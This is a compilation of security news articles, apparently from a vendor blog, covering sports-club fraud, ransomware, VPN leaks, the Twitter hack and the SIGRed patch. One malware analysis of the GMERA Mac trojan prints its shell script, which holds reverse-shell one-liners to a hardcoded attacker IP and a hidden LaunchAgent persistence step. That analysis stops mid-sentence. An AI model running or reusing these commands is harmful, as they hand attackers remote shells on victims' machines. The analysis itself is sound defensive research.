Premier League team narrowly avoids losing £1 million to scammers

In another incident, ransomware attackers almost forced the cancellation of a match, a report reveals

Sports organizations from around the United Kingdom have been urged to tighten their cybersecurity after a report revealed a string of attacks against various sports clubs, including an attempt to disrupt a lucrative Premier League transfer deal.

In its first Cyber Threat to Sports Organizations report, the UK’s National Cyber Security Centre (NCSC) singled out Business Email Compromise (BEC) fraud as the biggest threat to sports organizations, with financial gain being the key motivation for BEC attackers. No wonder the sports industry is a lucrative target, contributing £37 billion (US$47 billion) to the UK’s economy each year.

As an example, the NCSC highlighted an incident in which the email account belonging to the managing director of a Premier League club was compromised during a transfer negotiation worth £1 million (US$1.3 million). The attackers used a spear phishing attack involving a malicious email that took the director to a spoofed Office 365 login page where he unwittingly turned over his credentials.

“The attackers assumed the identity of the MD and communicated with the European club. Simultaneously they created a false email account and pretended to be the European club in communications with the real MD,” said the report.  Fortunately, a bank involved in the transfer stepped in at the eleventh hour and thwarted the scheme. In a way, the incident brings echoes of a similar scam where Italian Serie A team Lazio was reportedly duped out of £1.75 million (US$2.2 million).

The NCSC also singled out a ransomware attack that encrypted all end-user devices and several servers belonging to an English Football League club. The attack also cut off its security cameras and turnstiles, which almost led to a match cancellation. The team refused to pay a hefty 400 bitcoin ransom (some US$4 million today) and eventually recovered, but not before incurring losses totaling several hundred thousand pounds.

RELATED READING: Ransomware: Expert advice on how to keep safe and secure

Once it audited its systems, the team found that it lacked sufficient security controls, didn’t invest enough in cybersecurity infrastructure, and didn’t have an emergency response plan in place. Regularly patching and updating systems as well as having backups are just some of the recommendations organizations should implement; for more advice on defending against ransomware, be sure to check out this white paper.

In another incident, a member of staff at a UK racecourse wanted to purchase a piece of grounds keeping equipment on eBay, ultimately agreeing with a seller to pay £15,000 (some US$19,000) for one such listed item. “At this point the seller sent the member of staff bank transfer details via an eBay message, this diverted the member of staff to a spoofed version of eBay ,” reads the report. The buyer made the payment and while they later realized their mistake the money couldn’t be recovered.

RELATED READING: Common eBay scams and how to avoid them

The big picture

The NCSC report also revealed that at least 70% of the surveyed sports organizations experienced some form of cyber-incident or breach every year, with 3 in 10 incidents ending up causing direct financial damage to the targeted clubs. The average cost of such an incident was more than £10,000 (some US$12,700) while the biggest single loss incurred was worth an astounding £4 million (approx. US$5.1 million).

“While cybersecurity might not be an obvious consideration for the sports sector as it thinks about its return, our findings show the impact of cyber criminals cashing in on this industry is very real,” said Paul Chichester, Director of Operations at the NCSC. He also went on to urge sports organizations to improve their cybersecurity in order to protect themselves – as well as millions of fans. For example, to mitigate the risk of successful BEC attempts, organizations would be well advised to implement some form of multi-factor authentication.

Meanwhile, Sir Hugh Robertson, the Chair of the British Olympic association, acknowledged the importance of the report, saying, “The British Olympic Association sees this report as a crucial first step, helping sports organizations to better understand the threat and highlighting practical steps that organizations should take to improve cybersecurity practices.”

Google adds security enhancements to Gmail, Meet and Chat

The tech giant introduces its own version of verified accounts in Gmail, rolls out increased moderation controls in Meet, and enhances phishing protection in Chat

Google has announced a host of new features for its G Suite family of applications that are aimed at bolstering the security of Gmail, Meet and Chat users. The company is also introducing new ways for IT administrators to manage and secure devices using the Admin Console.

The search engine giant is piloting a new feature that will display the logo of an organization or brand in the avatar slot of the Gmail user interface. That should give people more confidence that the email message is from a legitimate sender and ultimately thwart phishing attacks that spoof genuine companies.

The new functionality uses the Brand Indicators for Message Identification (BIMI) standard and allows organizations that use the DMARC technology to validate the ownership of their logos and securely transmit them to Google. The BIMI standard is being developed by the AuthIndicators Working Group, which Google joined a year ago.

“BIMI provides benefits to the whole email ecosystem. By requiring strong authentication, users and email security systems can have increased confidence in the source of emails, and senders will be able to leverage their brand trust and provide their customers with a more immersive experience,” said Google.

Source: Google Cloud blog

The videoconferencing platform Google Meet also received a security boost in the form of new controls that allow the host to manage who can join meetings and how. Uninvited guests who have been ejected out of a meeting won’t be able to re-join unless the host re-invites them. Meanwhile, attendees who’ve had their knocking requests denied multiple times will be automatically banned from sending more requests.

Additionally, hosts are also receiving advanced safety lock capabilities that let them decide on the method through which people can join meetings and what level of participation they are allowed once they join. While safety locks are engaged, anonymous users, i.e. those not logged into their Google accounts, will be blocked from joining the meeting.

Google has also bolstered phishing protection in Google Chat. Previously launched on Gmail, the new safeguard checks links sent in Chat against real-time data from Safe Browsing and warns users if it finds anything suspicious. Blocking and reporting Chat Rooms if anything malicious is afoot is another feature that is being rolled out to users over the coming weeks. Google also added a filter that automatically detects and limits abusive content, such as spammy invites across G Suite.

RELATED READING: Would you get hooked by a phishing scam? Test yourself

IT admins will get a slew of new and enhanced tools to manage G Suite, including a redesigned devices page for better device management as well as Apple Business Manager integration allowing them to easily manage their organization’s iOS devices. Google has also introduced some new tools to its Data Loss Prevention feature.

The updates are being released to respond to the needs of people working remotely after COVID-19 has forced a lot of companies to shift to teleworking. If working from home is starting to feel demoralizing, ESET Chief Security Evangelist Tony Anscombe has some advice on how to overcome the associated challenges.

Privacy watchdogs urge videoconferencing services to boost privacy protections

The open letter highlights five security and privacy principles that require heightened attention from videoconferencing services

Six data protection and privacy authorities from countries in four continents have addressed an open letter to video teleconferencing (VTC) companies, asking them to re-evaluate how they safeguard the privacy rights and data of citizens around the globe.

With people tethered to their homes during the pandemic, videoconferencing services have seen a surge in use; including for staying in touch with friends and family and for hosting work meetings, online classes and virtual doctor appointments. However, the spike in demand has also been accompanied by reports of security issues faced by some of the platforms, as well as by concerns directly being raised with the regulatory bodies themselves.

“The purpose of this open letter is to set out our concerns, and to clarify our expectations and the steps you should be taking as VTC companies to mitigate the identified risks and ultimately ensure that our citizens’ personal information is safeguarded in line with public expectations and protected from any harm,” according to the letter, signed by privacy commissioners and regulators from Australia, Canada, Gibraltar, Hong Kong, Switzerland, and the United Kingdom.

The letter highlights five principles VTC companies should focus their attention on – security, privacy-by-design, knowing their audience, transparency and fairness, and end-user control. It is intended for all companies providing videoconferencing services; however, Microsoft, Cisco, Zoom, House Party and Google have been sent the letter directly.

The regulators expect companies to secure user data by implementing certain security safeguards as standard, such as end-to-end encryption for all communication and two-factor authentication for logins, as well as by requiring users to create strong passwords. Prompting people to regularly update to the newest version of their communication client is also expected of the VTC platforms.

“Particular attention should also be paid to ensuring that information is adequately protected when processed by third-parties, including in other countries,” reads the letter. Its signatories also acknowledge that the pandemic has led to VTC platforms being used in ways that are different from those they were designed for, which may open doors to unanticipated threats. They encourage the companies to review these new use-cases and implement necessary data protection and privacy measures accordingly.

“This is particularly important when it comes to children, vulnerable groups, and contexts where discussions on calls are likely to be especially sensitive (in education and healthcare for example), or when operating in jurisdictions where human rights and civil liberty issues might create additional risk to individuals engaging with the platform,” said the commissioners.

Where transparency and fairness are concerned, companies are asked to be up-front about what data they collect and how they handle it. The letter goes on to warn that failing to do so may lead to law violations and breaches of user trust. The privacy regulators expect to receive answers from the companies by September 30th, 2020.

Argentine telecom company hit by major ransomware attack

Telecom Argentina says it has contained the attack and regained access to its systems without paying up

Telecom Argentina, one of the country’s largest Internet Service Providers (ISPs), has suffered a major ransomware attack, according to a local report. The cybercriminals behind the attack demanded US$7.5 million in Monero cryptocurrency to unlock the encrypted files, but the company claims that it has restored access to its systems and that it hasn’t caved in to the extortionists’ demands.

The attack, which took place over the weekend, apparently didn’t have a sizeable impact on services provided by the company – the internet connection didn’t go down, nor were the landlines or any of its other services disrupted. However, there was some impact on systems that provide remote customer service.

The payload was delivered in an email attachment that was downloaded and opened by one of the employees. Ultimately, the attackers hijacked an internal Domain Admin and used it to spread the infestation to over 18,000 workstations. Having spotted the infiltration, the company sent out an internal communication to its customer service employees about the incident.

RELATED READING: Ransomware: To pay or not to pay?

The notice, which was later also shared by employees on various social media platforms, urged staff to minimize access, including through VPN, to the corporate network. The employees were also told not to open emails from unknown addresses and to turn off any compromised computers immediately.

According to ZDNet, the company was hit by Sodinokibi aka REvil ransomware, a threat also described in ESET’s recent Threat Report. Besides demanding a payment for unlocking access to the files, the operators of the Sodinokibi ransomware are known to ramp up pressure on victims by threatening to dump their sensitive information online.

In recent years, the ransomware scourge has affected organizations of all sizes, including small businesses, healthcare providers and city governments. In 2018, the US city of Atlanta was struck by an especially costly ransomware attack.

An executive audience could benefit from perusing ESET’s white paper on how enterprises can mitigate the risks of ransomware attacks. In recent years, the Remote Desktop Protocol (RDP) has become an increasingly popular attack vector for ransomware-wielding gangs, who typically brute-force their way into a poorly secured network, elevate their rights to admin level, disable or uninstall security solutions and then run ransomware to encrypt crucial company data.

7 VPN services leaked data of over 20 million users, says report

A report calls into question the providers’ security practices and dismisses their claims of being no-log VPN services

Seven Virtual Private Network (VPN) providers who claim not to keep any logs of their users’ online activities recently left 1.2 terabytes of private user data exposed to anyone who comes looking. The data, found on a server shared by the services, included the Personally Identifiable Information (PII) of potentially as many as 20 million VPN users, said researchers at vpnMentor, who uncovered the leak.

Besides the personal details, which included the users’ email and home addresses, clear text passwords, and IP addresses, the server was also found to store several instances of internet activity logs, which casts doubt on the providers’ claims about strict no-logs policies.

UFO VPN, FAST VPN, FREE VPN, SUPER VPN, Flash VPN, Secure VPN, and Rabbit VPN are all implicated in the incident. The report suggests that all these Hong Kong-based services have a shared developer and app and are assumed to be white-label solutions that are repurposed under different brands for other companies. This assumption is based on the services sharing the same Elasticsearch server, being hosted on the same assets, and on the fact that the services share a single recipient for payments.

The researchers ran a series of tests using one of the VPN services, UFO VPN. After downloading and using the mobile app to connect to servers around the globe, their activities were recorded in the database, comprising their personal details that included an email address, IP, address, device, and the server they connected to. Beyond confirming their suspicions, they also found that the database logged their username and password used to create the account.

The database even contained technical data about the devices on which the VPNs were installed, such as the origins’ IP addresses, Internet Service Provider, actual location, device model, type and ID, as well the user’s network connection. “The VPN server users connected to was also exposed, including its region and IP address. This makes the affected VPN service virtually useless, as the user’s origin IP address can be connected to their activity on the target server,” explained vpnMentor.

In a nutshell, all the details that were logged and exposed by these self-proclaimed “no-log” VPN services could spell problems in different orders of magnitude to their users. VPNs are used for several main reasons, including to add an extra layer of security and privacy, access content that may not be strictly legal in specific countries (some outlaw pornography), bypass geo-restrictions, or by political activists.

Depending on who is targeted by a malicious actor, the VPN users could end up getting targeted by phishing campaigns, become victims of fraud, or face blackmail, arrests and persecution.

Adhering to responsible disclosure guidelines, the researchers disclosed the security lapse to the VPN providers on July 5th and contacted the Hong Kong Computer Emergency Response Team on July 8th. The server was closed on July 15th.

The users of one of the seven VPN providers would be well advised to consider switching to another service and change their login information on any other online accounts. This report should in no way discourage you from using a VPN, but may instead be a reminder to choose your VPN provider carefully.

Data breach reports down by one‑third in first half of 2020

The Identity Theft Resource Center doesn’t expect the trend to last, however

While cybercriminals have been busy targeting people with various flavors of COVID-19-related scams, the number of publicly reported data breaches in the United States in the first half of 2020 dropped by 33% year-on-year.

This is according to a report published by the Identity Theft Resource Center (ITRC), which also revealed that that the number of people affected by data breaches between January and June of this year plummeted 66% on a yearly basis, bringing the number of impacted individuals to some 164 million.

Attacks by external threat actors are still considered to be the most common cause of data breaches, being responsible for 404 out of a total of 540 incidents reported in the first half of this year.

However, data compromises caused by insiders are at a three-year low, with 83 such incidents reported from January to June. The center attributes this in part to the pandemic, reasoning that more people are currently working from home and have less access to corporate systems and data.

ITRC president and CEO Eva Velasquez considers the decrease in the volume of data breaches and the number of impacted individuals good news for both consumers and businesses.

“However, the emotional and financial impacts on individuals and organizations are still significant. The impact on individuals may be even more harmful as criminals use stolen personal information to misappropriate government benefits intended to ease the impact of the COVID-19 pandemic,” she added. The Federal Trade Commission as well as the Internal Revenue Service have been warning about scammers targeting individuals eligible to receive stimulus payments.

RELATED READING: Simple steps to protect yourself against identity theft

Instead of harvesting new data, ITRC says, cybercriminals are currently utilizing data from breaches dating all the way back to 2015 to fuel their COVID-19 related scams, as well as to conduct other traditional fraud activities, such as phishing campaigns and credential-stuffing attacks.

The ITRC suggests that if the trend continues and there are no sudden surges in the number of breaches, 2020 is on track to be the year with the lowest number of breaches and data exposures since 2015. But the center is skeptical that the lull will last. Once the criminals’ credential well starts running dry, Velasquez expects things to go back to ‘normal’.

“Cybercriminals will have to act to update their data at some point, which will lead to a return to more normal threat patterns. While it is too early to tell when that may occur, it likely won’t happen overnight, but breaches will gradually increase over time.”

There are multiple easy steps you can take to mitigate the risks of becoming a victim of an incident that exploits data stolen in a security breach. For starters, stop recycling your passwords and instead use a unique and strong password or passphrase for each of your online accounts. Admittedly, this is by no means an easy feat, which is why a password manager can come in handy. Another thing you can do is employ two-factor authentication to add an extra layer of security to your accounts. And finally, try to adhere to best cybersecurity practices, including by brushing up on some of the basics outlined in this article.

Week in security with Tony Anscombe

Trojanized cryptocurrency trading apps targeting Mac users – An Android chat app turns out to be spyware – Twitter sustains a massive hack

ESET researchers uncover a malicious campaign that rebrands legitimate cryptocurrency trading applications for Mac to deliver GMERA malware and steal cryptocurrency and data from victims. Also this week, ESET experts released their findings about a malicious operation that spies on Android users via Welcome Chat, an app posing as a secure chat service. Twitter has sustained an unprecedented security incident where the accounts of a long list of prominent figures were hacked to promote a Bitcoin scam. All this – and more – on WeLiveSecurity.com.

High‑profile Twitter accounts hacked to promote Bitcoin scam

Tech titans and prominent politicians among victims of a sprawling hack that Twitter says leveraged its internal tools

Twitter is reeling from what is arguably the biggest security breach in its history after the accounts of a long list of high-profile figures – including Barack Obama, Joe Biden, Elon Musk, Bill Gates and Jeff Bezos – were hijacked and used to promote a Bitcoin scam.

The spate of attacks started late on Wednesday, with one of the first suspicious tweets then fired off from the account of the Tesla and SpaceX CEO. The now-deleted tweet followed a familiar pattern, bringing echoes of cryptocurrency scams that used Musk’s name and promised to return double the amount of bitcoin sent:

“I‘m feeling generous because of Covid-19. I’ll double any BTC payment sent to my BTC address for the next hour. Good luck, and stay safe out there!” read the message that appeared on Musk’s account.

RELATED READING: What to do if your Twitter account has been hacked

A flurry of similar tweets were also sent out from the other hijacked handles; apparently, some people fell for the ploy, since one of the cryptocurrency addresses has, as of the time of writing, received 12.86 BTC (some US$117,000).

We are aware of a security incident impacting accounts on Twitter. We are investigating and taking steps to fix it. We will update everyone shortly.

— Twitter Support (@TwitterSupport) July 15, 2020

The social media giant took a number of steps to swiftly remedy the situation. This included temporarily locking all compromised accounts, with Twitter stating that it would restore access only when it could do so securely. In short order, the company went on to take the unprecedented step of temporarily locking down all verified accounts, i.e. accounts marked by a blue tick.

We also limited functionality for a much larger group of accounts, like all verified accounts (even those with no evidence of being compromised), while we continue to fully investigate this.

— Twitter Support (@TwitterSupport) July 16, 2020

All the while, Twitter sought to keep everyone appraised by maintaining a steady stream of tweets informing about the developing situation. Eventually, the company started restoring functionality to the accounts, allowing them to tweet again.

So, how did it all happen?

Obviously the key question that screams for an answer is: “How was the massive hack executed?” According to the microblogging site, the incidents were caused by a social engineering attack on its employees:

We detected what we believe to be a coordinated social engineering attack by people who successfully targeted some of our employees with access to internal systems and tools.

— Twitter Support (@TwitterSupport) July 16, 2020

Meanwhile, a Motherboard article seems to suggest that there may be more to the story, as several confidential sources from the black-hat community told the site that they had actually paid a Twitter insider to do the job.

In response, a Twitter spokesperson told Motherboard that the company was looking into whether the employee had possibly hijacked the account themselves or provided the cybercriminals with access to the tool.

RELATED READING: Insider threats: A persistent and widespread problem

ESET Security Specialist Jake Moore put the issue into a broader context: “Acting like a help desk, these employee accounts were enabled to use a specific admin tool and do whatever they wanted, which is likely to be a problem for many businesses. Some organizations lend an incredible amount of trust to certain employees. However, although they may be trusted not to compromise an account themselves, it must be taken into consideration that the employees will be targeted by criminal hackers.”

He also had some advice to share urging Twitter users to watch out for online scams: “When a message seems too good to be true it probably is, regardless of who has posted it. Bitcoin doubling schemes are synonymous with the criminal fraternity and must be avoided and reported where possible.”

Mac cryptocurrency trading application rebranded, bundled with malware

ESET researchers lure GMERA malware operators to remotely control their Mac honeypots

We’ve recently discovered websites distributing malicious cryptocurrency trading applications for Mac. This malware is used to steal information such as browser cookies, cryptocurrency wallets and screen captures. Analyzing the malware samples, we quickly found that this was a new campaign of what Trend Micro researchers called GMERA, in an analysis they published in September 2019. As in the previous campaigns, the malware reports to a C&C server over HTTP and connects remote terminal sessions to another C&C server using a hardcoded IP address. This time, however, not only did the malware authors wrap the original, legitimate application to include malware; they also rebranded the Kattana trading application with new names and copied its original website. We have seen the following fictitious brandings used in different campaigns: Cointrazer, Cupatrade, Licatrade and Trezarus. In addition to the analysis of the malware code, ESET researchers have also set up honeypots to try to reveal the motivations behind this group of criminals.

Distribution

We have not yet been able to find exactly where these trojanized applications are promoted. However, in March 2020, Kattana posted a warning suggesting that victims were approached individually to lure them into downloading a trojanized app. We couldn’t confirm that it was linked to this particular campaign, but it could very well be the case.

Figure 1. Kattana warns about trojanized copies of their software on Twitter

Copycat websites are set up to make the bogus application download look legitimate. For a person who doesn’t know Kattana, the websites do look legitimate.

Figure 2. Original (legitimate) Kattana website Figure 3. Malicious Licatrade website with download link to malware
The download button on the bogus sites is a link to a ZIP archive containing the trojanized application bundle. Analysis

Malware analysis in this case is pretty straightforward. We will take the Licatrade sample as the example here. Other samples have minor differences, but the ideas and functionalities are essentially the same. Similar analyses of earlier GMERA campaigns are provided in Trend Micro’s blogpost and in Objective-See’s Mac malware of 2019 report.

Figure 4. Content of the Licatrade application bundle

Modification timestamps of the files in the ZIP archive, the date the application was signed, and the Last‑Modified HTTP header when we downloaded the archive all show April 15th, 2020. This is highly suggestive that this campaign started on that date.

A shell script (run.sh) is included in the resources of the application bundle. This main executable, written in Swift, launches run.sh. For some reason, the malware author has duplicated functionality to send a simple report to a C&C server over HTTP, and to connect to a remote host via TCP providing a remote shell to the attackers, in both the main executable and the shell script. An additional functionality, in the shell script only, is to set up persistence by installing a Launch Agent.

Here is the full shell script source (ellipsis in long string and defanged):

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

#! /bin/bash

function remove_spec_char(){

echo “$1” | tr -dc ‘[:alnum:].r’ | tr ‘[:upper:]’ ‘[:lower:]’

}

whoami=”$(remove_spec_char `whoami`)”

ip=”$(remove_spec_char `curl -s ipecho.net/plain`)”

req=`curl -ks “http://stepbystepby[.]com/link.php?${whoami}&${ip}”`

plist_text=”ZWNobyAnc2R2a21…d2Vpdm5laXZuZSc=”

echo “$plist_text” | base64 –decode > “/tmp/.com.apple.system.plist”

cp “/tmp/.com.apple.system.plist” “$HOME/Library/LaunchAgents/.com.apple.system.plist”

launchctl load “/tmp/.com.apple.system.plist”

scre=`screen -d -m bash -c ‘bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1’`

It’s interesting to note that persistence is broken in the Licatrade sample: the content of the resulting Launch Agent file (.com.apple.system.plist) isn’t in Property List format as launchd expects, but instead is the command line to be executed.

The decoded content (ellipses in long strings) of the $plist_text variable is:

echo ‘sdvkmsdfmsd…kxweivneivne’; while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c ‘bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1’; done; echo ‘sdvkmsdfmsdfms…nicvmdskxweivneivne’

If run directly, this code would open a reverse shell from the victim machine to an attacker-controlled server, but that fails here. Fortunately for the attackers, the last line of the shell script also starts a reverse shell to their server.

The Cointrazer sample, used in campaigns prior to Licatrade, does not suffer from this issue: the Launch Agent is installed and successfully starts when the user logs in.

The various reverse shells used by these malware operators connect to different remote ports depending on how they were started. All connections are unencrypted. Here is a list of ports, based on the Licatrade sample.

TCP Port Where How 25733 Licatrade executable zsh in screen using ztcp run.sh bash in screen using /dev/tcp Launch Agent (Not working) bash in screen using /dev/tcp 25734 Licatrade executable zsh using ztcp 25735 Licatrade executable bash using /dev/tcp 25736 Licatrade executable bash in screen using /dev/tcp 25737 Licatrade executable bash in screen using /dev/tcp 25738 Licatrade executable zsh in screen using ztcp

Here are some example command lines used:

Bash in screen using /dev/tcp:

screen -d -m bash -c ‘bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1’

zsh using ztcp:

zsh -c ‘zmodload zsh/net/tcp && ztcp 193.37.212[.]97 25734 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY’

The rebranded Kattana application is also in the resources of the application bundle. We wanted to see if, besides the change in name and icon in the application, some other code was changed. Since Kattana asks for credentials for trading platforms to perform trading, we verified if the input fields of these were tampered with and if credentials were exfiltrated in some way. Kattana is built with Electron, and Electron apps have an app.asar file, which is an archive containing the JavaScript code of the application. We have checked all changes between the original Kattana application and the malicious Licatrade copycat and found that only strings and images were changed.

Figure 5. Partial difference between Kattana and Licatrade

Licatrade and its

Microsoft patches critical, wormable flaw in Windows DNS Server

The company urges organizations to waste no time in installing updates to fix the vulnerability that rates a ‘perfect’ 10 on the severity scale

Microsoft has released a patch addressing a vulnerability that has been present in Windows Domain Name System (DNS) Server for no fewer than 17 years. Dubbed SIGRed, this critical Remote Code Execution (RCE) vulnerability affects all Windows Server versions 2003 through 2019 and, if exploited, could be used to compromise a company’s entire IT infrastructure.

Tracked as CVE-2020-1350, the vulnerability was classified as “wormable” and earned the highest possible score of 10.0 on the Common Vulnerability Scoring System (CVSS) severity scale.

“Wormable vulnerabilities have the potential to spread via malware between vulnerable computers without user interaction,” said Mechele Gruhn, a principal security program manager at Microsoft. “While this vulnerability is not currently known to be used in active attacks, it is essential that customers apply Windows updates to address this vulnerability as soon as possible,” she added.

Much the same message was dispatched by the United States Cybersecurity and Infrastructure Security Agency (CISA).

Microsoft has released an update addressing a “wormable” RCE vulnerability, CVE-2020-1350, in Windows DNS Server. Update asap! https://t.co/yjvpIgZbA3 #Cybersecurity #InfoSec

— US-CERT (@USCERT_gov) July 14, 2020

The flaw, which can be triggered by a malicious DNS response, was discovered by Check Point researchers, who reported it to Microsoft in May. According to their detailed write-up, an attacker who can exploit the vulnerability would gain Domain Administrator rights and seize control of the target’s entire IT infrastructure. This could entail accessing and stealing documents and tampering with emails or network traffic. The likelihood of the vulnerability being exploited was deemed high.

SIGRed brings echoes of other wormable vulnerabilities, notably BlueKeep in Remote Desktop Protocol (RDP) as well as the vulnerability in the Server Message Block (SMB) protocol that was exploited by EternalBlue. The patch for the newly-identified vulnerability is part of Microsoft’s Patch Tuesday rollout, which fixed a total of 123 security flaws this month, including 18 rated as critical.